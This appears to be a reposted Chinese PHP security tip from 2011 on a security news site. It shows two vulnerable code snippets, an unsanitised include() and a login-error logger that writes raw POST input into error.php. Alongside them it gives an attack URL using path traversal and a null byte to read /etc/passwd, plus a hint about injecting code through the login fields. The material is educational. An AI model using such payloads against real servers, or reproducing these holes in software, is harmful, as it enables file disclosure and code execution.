Php安全新闻早8点(2011-11-16 星期三) - 技术文章

admin 2021年4月3日19:35:47评论17 views字数 279阅读0分55秒阅读模式

    转载自:http://hi.baidu.com/micropoor

//2011-11-16 星期三
// 程序员的思维:
// Micropoor.php ---代码片段
$Micropoor=$_GET[Micropoor];
include($Micropoor.'php');
?>
//我们的思维:
http://www.127.0.0.1/Micropoor.php?Micropoor=/../../../../../etc/passwd%00
 
// 程序员的思维:     
// Micropoor.php ---代码片段
//略
  $fp = fopen($cacheFile, 'w');
  fwrite($fp, $myvalues);
  fclose($fp);
//略
?>
 //login.php  ---代码片段
    $username=$_POST[‘username’];
    $password=$_POST[‘password’];
    $centent=time().”用户名$username登录错误,登录密码为:$password”;
    $sql={sql}….
    If(!={sql}){  
            $fp = fopen(error.php, 'w');
         fwrite($fp, $centent);
         fclose($fp);
    echo “用户名或者密码错误!”
    }
?>
//我们的思维:
*POST: username or password  inject ->

    结论:一不留神便全军覆没

文章来源于lcx.cc:Php安全新闻早8点(2011-11-16 星期三) - 技术文章

相关推荐: 中国黑客谱系

导读--17岁的莱安诺·拉斯特凭想象写出《骇客帝国》,hacker传入中国,被译为黑客。     一个时代的终结终需要一个符号。2004年最后一天,中国红客联盟(HUC)发起人lion关闭了这个曾经聚集了国内最多黑客爱好者的网站。这在网上激起了一波怀旧潮,一篇…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:35:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Php安全新闻早8点(2011-11-16 星期三) - 技术文章http://cn-sec.com/archives/323750.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息